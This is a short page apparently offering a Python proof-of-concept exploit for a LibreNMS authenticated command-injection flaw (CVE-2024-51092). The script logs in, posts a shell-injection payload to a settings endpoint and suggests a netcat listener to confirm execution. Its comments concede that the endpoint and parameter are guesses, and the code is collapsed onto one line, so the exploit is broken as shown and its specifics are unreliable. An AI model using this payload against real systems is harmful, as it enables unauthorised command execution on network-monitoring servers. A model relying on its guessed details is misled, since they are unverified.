CVE-2024-51092 LibreNMS 远程代码执行漏洞

#!/usr/bin/env python3 # Proof of Concept for CVE-2024-51092 (LibreNMS Authenticated RCE) # This script demonstrates the command injection vulnerability in SettingsController. import requests from requests.auth import HTTPBasicAuth # Configuration target_url = "http://127.0.0.1/librenms" username = "admin" password = "password" command = "id" # The command to execute # The vulnerable endpoint often involves updating settings where parameters are sanitized poorly # Based on the advisory, SettingsController.php's update() is vulnerable. # Payload structure usually involves appending a command separator. payload = f"normal_value; {command}" session = requests.Session() # 1. Login to obtain session (Authentication is required) login_url = f"{target_url}/login" login_data = { "username": username, "password": password } print(f"[*] Logging in to {target_url}...") r = session.post(login_url, data=login_data) if r.status_code == 200: print("[+] Login successful.") # 2. Exploit the vulnerability in SettingsController # Note: The specific parameter name and endpoint path might vary based on the exact controller logic. # This is a representative example of exploiting the update() method. exploit_url = f"{target_url}/settings/update" exploit_data = { "setting[global][community]": payload # Example parameter that might be passed to shell } print(f"[*] Sending payload to {exploit_url}...") exploit_res = session.post(exploit_url, data=exploit_data) # 3. Check output (Output might not be directly reflected, blind techniques needed) if exploit_res.status_code == 200: print("[+] Payload sent. Check if command was executed (e.g., via netcat listener or log analysis).") else: print("[-] Exploit request failed.") else: print("[-] Login failed.")